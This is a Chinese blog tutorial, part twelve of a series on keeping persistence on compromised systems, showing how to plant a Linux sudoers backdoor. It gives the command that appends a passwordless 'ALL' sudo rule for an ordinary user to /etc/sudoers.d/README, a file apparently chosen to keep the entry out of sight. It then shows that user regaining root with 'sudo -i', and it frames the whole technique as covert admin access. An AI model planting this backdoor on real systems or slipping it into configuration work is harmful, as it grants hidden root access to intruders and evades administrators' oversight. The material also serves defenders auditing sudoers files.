操作系统权限维持(十二)之Linux系统-sudoers利用后门

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门
操作系统权限维持(十)之Linux系统-SSH 软连接后门
操作系统权限维持(十一)之Linux系统-SSH Wrapper后门

sudoers利用后门

此后门用于在丢失root用户身份时,重新获得root身份

sudo命令可以使用户临时获得管理员权限执行命令,sudo的控制都是基于sudoers文件来控制的,里面限制了用户名,用户组,执行什么等。

/etc/sudoers的通用格式为:user host runas command user:一位或几位用户,在/etc/group中可以用一个%代替它,组对象的名称一定要用百分号%开头。

host:一个或几个主机名;runas:作为哪个用户运行,常见选项是root和ALL command:想让用户或组运行的一个或几个根级别命令。

例如:hans ALL=(root) useradd,userdel 授权hans用户在所有计算机上以root身份运行useradd,userdel命令。

这样我们用一句话将内置/或者我们自己添加的普通权限用户添加到sudoer列表中,这样就可以偷着执行管理员权限的命令了。将原本低权限用户当做后门使用。

首先我们先要去编辑/etc/sudoers.d/README文件

vim /etc/sudoers.d/README

操作系统权限维持(十二)之Linux系统-sudoers利用后门_第1张图片
执行下命令向文件中添加内容

sudo su -c "echo 'xiaowang ALL = NOPASSWD: ALL' >> /etc/sudoers.d/README"
这里的 xiaowang是你丢失root权限后用来取回root权限的普通用户
cat /etc/sudoers.d/README

操作系统权限维持(十二)之Linux系统-sudoers利用后门_第2张图片

此时我们切换为普通用户xiaowang以模仿实战中我们丢失了root身份

然后我们执行

sudo -i

重新拿回root身份

操作系统权限维持(十二)之Linux系统-sudoers利用后门_第3张图片

你可能感兴趣的:(操作系统权限维持,linux,服务器,网络安全,安全,网络)